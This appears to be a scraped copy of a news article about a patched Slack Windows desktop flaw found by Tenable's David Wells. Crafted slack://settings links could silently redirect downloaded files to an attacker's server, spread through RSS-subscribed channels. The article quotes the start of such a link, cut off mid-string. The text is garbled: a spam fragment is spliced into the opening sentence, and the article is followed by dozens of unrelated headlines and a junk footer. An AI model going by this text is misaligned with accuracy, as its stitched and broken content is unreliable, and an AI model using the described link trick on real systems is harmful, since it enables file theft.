A security researcher has uncovered a flaw in Slack that could've been exploited to steal files over the business messaging app1+ Archivespotentially spread malware.
The flaw involves Slack's Windows desktop app, and how it can automatically send downloaded files to a certain destination—whether it be on your PC or to an online storage server. You can set a download location in the app's preferences section. However, David Wells, a researcher at the security firm Tenable, noticed there's another way to configure the option: Via a special link.
"Crafting a link like 'slack://settings/?update={ 'PrefSSBFileDownloadPath':
Wells realized the same function could be abused. Imagine a hacker using the links to secretly reconfigure a Slack desktop app to send all downloaded files to an outside server. "Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview," Well's security firm Tenable said in a separate report.
Original image has been replaced. Credit: Mashable The vulnerability can also pave the way for potential malware infections. Any downloaded files sent to the hacker-controller server can be altered and booby-trapped to include malicious code. The attack will commence once the victim opens the file on the Slack desktop app.
The main obstacle of carrying out this attack is circulating the hacker-created links to people on Slack, which keeps its channels private to paying clients and their companies. To pull this off, Wells noticed how Slack channels can be configured to subscribe to RSS feeds, including threads on Reddit.
"I could make a post to a very popular Reddit community that Slack users around the world are subscribed to," Wells said. The hacker-created link will then populate inside the Slack channel and possibly attract some clicks.
"This technique could be unmasked by savvy Slack users, however if decades of phishing campaigns have taught us anything, it's that users click links, and when leveraged through an untrusted RSS feed, the impact can get much more interesting," he added.
Slack has patched the flaw in version 3.4.0 of the Windows desktop app. "We investigated and found no indication that this vulnerability was ever utilized, nor reports that our users were impacted," the company said in an email.
President Trump says semiconductor tariffs are next
John Jeremiah Sullivan’s Remarks on Frederick Seidel
The Fight to Save the San Diego Opera
The Early Days of The Paris Review
10 Tech Predictions for 2017
Wimbledon crowd gives emotional standing ovation to COVID
IKEA Canada made an ugly, judgemental bisexual couch
The Fight to Save the San Diego Opera
Put Me In, Coach!
The Illustrated Walt Whitman
How to Easily Make iPhone Ringtones Using Only iTunes
The Morning News Roundup for May 13, 2014
Three Angry Women
'The Last Voyage of the Demeter' review: A Dracula horror story at war with itself
Get the official Atari 7800+ Console for 50% off
'Red, White & Royal Blue' review: A sexy gay romance that will make you swoon
Wordle today: Here's the answer and hints for August 11
The Other Yellow Pages
The Sound and the “Furious”
Hulk, the Brazilian Outsider
Amazon admits Alexa's evil laugh is odd, and Alexa has a confessionThere's only one good name for the next iPhoneBro responsible for Fyre Festival pleaded guilty to fraudNew satirical 'beer for girls' becomes what it's trying to mockObama in talks with NetflixEven tires are smart now — and cars can flyMinnesota politician writes bill to ban 'Bachelor' star Arie from stateThe Clippers celebrate International Women's Day with...Ayn Rand?iPhone X's notch probably won't get smaller or disappear anytime soonNotifications are broken. Here's how Apple and Google can fix themI went to a self'Call of Duty: Black Ops 4' teasing begins with James Harden's hatGeek Squad and the FBI have worked together for at least a decadeCelebrate women's stories with 12 International Women's Day Google Doodles'The Wolf of Wall Street' is still leading a moneyWhat the hell is up with those bizarre Fox News Apple alerts?There's only one good name for the next iPhoneWeather bureau staff investigated for alleged cryptocurrency mining on work computers'Star Wars' TV series coming from Jon FavreauHey Travis Kalanick, your fund's name is trucker code for pissing Celebrities are finally getting in on the 'it me' joke Thieves tried to kidnap a shark by disguising it as a baby Will Smith and Chris Rock: Why you cared so much about the slap 'Moon Knight' is proof that you don't need Avengers to make a great Marvel show The Rock gifted his stunt double a new truck and it's so wholesome Oh nothing, just some perfectly adorable Instagrams of The Rock meeting sea creatures Dyson unveils Dyson Zone, over ear headphones with attachable air purifier How to meditate while driving and charging your electric car NBC's Katy Tur confronts Trump over press: 'Do you have to put our lives in danger?' The 10 most streamed movies of the week. 5 won Oscars. 'Wordle' today: Here's the March 31 answer 9 best spy movies on Netflix for a high Congressman tries to channel Trump's 'charm' in painfully bad new ad How to watch all the 2022 Oscar People are sending thoughts and prayers to the NRA, which says it’s in financial trouble 'Wordle' today: Here's the answer for March 28 'Moonshot' review: A sci 'Bridgerton' gets the real TikTok is reportedly testing a 'Watch History' feature FedEx's newest cargo plane is an autonomous drone
2.5273s , 10132.578125 kb
Copyright © 2025 Powered by 【21+ Archives】,Defense Information Network